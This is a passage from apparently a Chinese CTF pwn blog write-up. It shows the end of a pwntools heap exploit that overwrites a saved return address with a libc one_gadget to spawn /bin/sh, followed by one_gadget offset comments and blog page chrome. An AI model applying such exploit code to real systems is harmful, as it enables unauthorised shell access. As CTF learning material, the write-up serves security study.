class="line">edit(<span class="number">2</span>,p64(stack_addr-<span class="number">240</span>))</span><br><span class="line">edit(<span class="number">1</span>,p64(libcbase+one_gadget[<span class="number">0</span>]))</span><br><span class="line"></span><br><span class="line"><span class="comment">#debug()</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&quot;(CMD)&gt;&gt;&gt; &quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;q&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x45226 execve(&quot;/bin/sh&quot;, rsp+0x30, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   rax == NULL</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x4527a execve(&quot;/bin/sh&quot;, rsp+0x30, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x30] == NULL</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0xf03a4 execve(&quot;/bin/sh&quot;, rsp+0x50, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x50] == NULL</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0xf1247 execve(&quot;/bin/sh&quot;, rsp+0x70, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x70] == NULL</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/heap/" rel="tag"># heap</a>
              <a href="/tags/house-of-xxx/" rel="tag"># house_of_xxx</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/01/02/time_formatter/" rel="prev" title="Time formatter">
      <i class="fa fa-chevron-left"></i> Time formatter
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/01/02/shellcode_revenge/" rel="next" title="Shellcode_revenge">
      Shellcode_revenge <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="a1ph0nse"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">a1ph0nse</p>
  <div class="site-description" itemprop="description">pwn菜狗、cs菜鸡</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">74</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">42</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">a1ph0nse</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
